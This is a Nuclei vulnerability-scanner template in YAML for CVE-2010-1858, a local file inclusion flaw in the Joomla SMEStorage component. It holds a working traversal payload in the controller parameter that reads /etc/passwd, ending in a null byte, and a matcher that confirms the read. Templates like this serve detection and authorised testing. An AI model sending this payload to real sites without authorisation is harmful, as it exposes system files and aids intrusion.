nuclei-templates/cves/2010/CVE-2010-1858.yaml

28 lines
808 B
YAML

id: CVE-2010-1858
info:
name: Joomla! Component SMEStorage - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11853
- https://www.cvedetails.com/cve/CVE-2010-1858
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200